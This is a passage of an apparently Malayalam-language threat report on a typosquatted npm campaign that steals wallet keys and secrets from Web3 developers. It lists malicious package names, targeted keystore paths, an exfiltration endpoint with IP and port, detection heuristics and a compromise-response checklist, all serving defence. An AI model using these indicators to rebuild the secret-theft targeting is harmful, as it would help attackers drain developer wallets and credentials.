viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core ഏതെങ്കിലും പൊരുത്തം package-lock.json, yarn.lock, pnpm-lock.yaml, അഥവാ node_modules ചരിത്രത്തെ ഗൗരവമുള്ള ഒരു സംഭവമായി കണക്കാക്കണം.
രണ്ടാമതായി, വാലറ്റ് കീസ്റ്റോർ പാത്തുകൾ വായിക്കുന്ന Node.js പ്രക്രിയകൾക്കായി നിരീക്ഷിക്കുക:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ ഒരു സഹായി ആശ്രിതത്വമായി ഇറക്കുമതി ചെയ്ത ഒരു പാക്കേജിന് ഇത് വളരെ അപൂർവമായി മാത്രമേ നിയമാനുസൃതമായ പെരുമാറ്റമാകൂ. ഔട്ട്ബൗണ്ട് നെറ്റ്വർക്ക് പ്രവർത്തനം പിന്തുടരുമ്പോൾ ഇത് പ്രത്യേകിച്ച് സംശയാസ്പദമാണ്.
മൂന്നാമതായി, HTTPS കണക്ഷനുകളിൽ തടയുക അല്ലെങ്കിൽ മുന്നറിയിപ്പ് നൽകുക:
76.13.37.80:8443 പ്രത്യേകിച്ചും അഭ്യർത്ഥന പാത ഇതായിരിക്കുമ്പോൾ:
/api/v1/telemetry നാലാമതായി, ഈ സ്വഭാവവിശേഷങ്ങൾ സംയോജിപ്പിക്കുന്ന npm പാക്കേജുകൾക്കായി തിരയുക:
- പുതിയതോ കുറഞ്ഞ പ്രശസ്തിയുള്ളതോ ആയ പ്രസാധകൻ
- പരിശോധിക്കാത്ത Gmail അക്കൗണ്ട്
- Web3-ന്റെ തൊട്ടടുത്തുള്ള പാക്കേജിന്റെ പേര്
- അർത്ഥവത്തായ സംഭരണ ചരിത്രമില്ല.
- ചെറിയ പാക്കേജ് ലേഔട്ട്
index.jsഒരു ടെലിമെട്രി അല്ലെങ്കിൽ സഹായ ഫയൽ ലോഡ് ചെയ്യുന്നത്- റൺടൈം ഡിപൻഡൻസികളൊന്നുമില്ല
- സെൻസിറ്റീവ് പരിസ്ഥിതി-വേരിയബിൾ ശേഖരം
- വാലറ്റ് കീസ്റ്റോർ ആക്സസ്
ഈ പാറ്റേൺ ഒരൊറ്റ ഐഒസിയെക്കാൾ കൂടുതൽ ഉപയോഗപ്രദമാണ്, കാരണം അടുത്ത പാക്കേജ് ഐപി വിലാസം മാറ്റിയേക്കാം, പക്ഷേ അതേ ടാർഗെറ്റിംഗ് ലോജിക് നിലനിർത്തും.
കോംപ്രമൈസ് പ്രതികരണ ചെക്ക്ലിസ്റ്റ്
ഒരു ഡെവലപ്പർ ആറ് പാക്കേജുകളിൽ ഒന്ന് ഉപയോഗിക്കുകയും അവയുടെ പരിസ്ഥിതി ആക്ടിവേഷൻ ഗേറ്റുമായി പൊരുത്തപ്പെടുകയും ചെയ്താൽ, വർക്ക്സ്റ്റേഷൻ വിട്ടുവീഴ്ച ചെയ്തതായി കണക്കാക്കുക.
അതിൽ ഫൗണ്ടറി ഇൻസ്റ്റാൾ ചെയ്ത മെഷീനുകൾ, പരിസ്ഥിതിയിൽ ആൽക്കെമി അല്ലെങ്കിൽ ഇൻഫുറ കീകൾ, പ്രൈവറ്റ് കീകൾ, മെമ്മോണിക്സ് അല്ലെങ്കിൽ ഡിപ്ലോയർ കീകൾ എന്നിവ ഉൾപ്പെടുന്നു.
ശുപാർശ ചെയ്യുന്ന പ്രതികരണം:
- നെറ്റ്വർക്കിൽ നിന്ന് ഹോസ്റ്റ് വിച്ഛേദിക്കുക.
- സംരക്ഷിക്കുക
node_modules, ലോക്ക്ഫയലുകൾ, ഷെൽ ചരിത്രം, ഫോറൻസിക്സിനുള്ള പ്രസക്തമായ ലോഗുകൾ. - ഓരോ SSH കീപെയറും താഴെ തിരിക്കുക
~/.ssh/. - ഓരോ കീസ്റ്റോറിനും താഴെയുള്ള വാലറ്റ് കീകൾ തിരിക്കുക
~/.foundry,~/.ethereum, ഒപ്പം~/.brownie. - പുതിയ വാലറ്റുകളിലേക്ക് ഫണ്ടുകൾ മാറ്റുക.
- സംഭരിച്ചിരിക്കുന്ന എല്ലാ രഹസ്യങ്ങളും തിരിക്കുക
.env*ഡെവലപ്പർ പ്രവർത്തിച്ചിരുന്ന റിപ്പോസിറ്ററികളിലെ ഫയലുകൾ. - AWS കീകൾ, npm ടോക്കണുകൾ, ഡിപ്ലോയ് ടോക്കണുകൾ, API കീകൾ, പ്രൈവറ്റ് കീകൾ, സീഡുകൾ, മെമ്മോണിക്സ് എന്നിവയുൾപ്പെടെ കളക്ഷൻ റീജെക്സുമായി പൊരുത്തപ്പെടുന്ന പരിസ്ഥിതി രഹസ്യങ്ങൾ തിരിക്കുക.
- പാക്കേജ് ആദ്യമായി ഇൻസ്റ്റാൾ ചെയ്തതുമുതൽ ക്ലൗഡ്, npm, GitHub, RPC ദാതാവ്, ബ്ലോക്ക്ചെയിൻ പ്രവർത്തനം എന്നിവ ഓഡിറ്റ് ചെയ്യുക.
- പുനരുപയോഗിക്കുന്നതിന് മുമ്പ് വർക്ക്സ്റ്റേഷൻ വീണ്ടും ഇമേജ് ചെയ്യുക.
പ്രതിരോധക്കാർ എന്തൊക്കെ കരുതണം
ഉയർന്ന മൂല്യമുള്ള ഡെവലപ്പർ ആവാസവ്യവസ്ഥയിൽ npm ടൈപ്പോസ്ക്വാട്ടിംഗ് എങ്ങനെ വികസിച്ചുവരുന്നുവെന്ന് ഈ കാമ്പെയ്ൻ കാണിക്കുന്നു.
നടന് സ്ഥിരോത്സാഹം ആവശ്യമില്ലായിരുന്നു. അവർക്ക് അവ്യക്തമാക്കൽ ആവശ്യമില്ലായിരുന്നു. ഇൻസ്റ്റാൾ-ടൈം എക്സിക്യൂഷൻ പോലും അവർക്ക് ആവശ്യമില്ലായിരുന്നു.
പകരം, അവർ മൂന്ന് കാര്യങ്ങളെ ആശ്രയിച്ചു:
- വിശ്വസനീയമായ Web3 പാക്കേജ് പേരുകൾ
- യഥാർത്ഥ ക്രിപ്റ്റോ-ഡെവലപ്മെന്റ് മെഷീനുകളിൽ മാത്രം സജീവമാക്കൽ
- Ethereum ഡെവലപ്പർമാർക്ക് ഏറ്റവും പ്രധാനപ്പെട്ട ഫയലുകളുടെയും രഹസ്യങ്ങളുടെയും നേരിട്ടുള്ള മോഷണം
അതുകൊണ്ടുതന്നെ, വിശാലമായ പരിശോധനയിൽ കാമ്പെയ്ൻ എളുപ്പത്തിൽ നഷ്ടപ്പെടുത്താനും ശരിയായ അന്തരീക്ഷത്തിൽ ഇറങ്ങുമ്പോൾ അപകടകരവുമാക്കുന്നു.
Web3 ടീമുകളെ സംബന്ധിച്ചിടത്തോളം, പാഠം വ്യക്തമാണ്: ആശ്രിതത്വ നാമങ്ങളെ നിങ്ങളുടെ ഭീഷണി മാതൃകയുടെ ഭാഗമായി പരിഗണിക്കുക. നിരുപദ്രവകരമായ ഒരു സഹായിയെപ്പോലെ തോന്നിക്കുന്ന ഒരു പാക്കേജ് ഇപ്പോഴും വാലറ്റ് വിട്ടുവീഴ്ചയ്ക്കുള്ള ഏറ്റവും ചെറിയ പാതയായി മാറിയേക്കാം.
npm രജിസ്ട്രിയിൽ റിപ്പോർട്ട് ചെയ്തു. പ്രസാധക അക്കൗണ്ടും പാക്കേജുകളും നീക്കം ചെയ്യുമ്പോൾ ഞങ്ങൾ ഈ പോസ്റ്റ് അപ്ഡേറ്റ് ചെയ്യും.




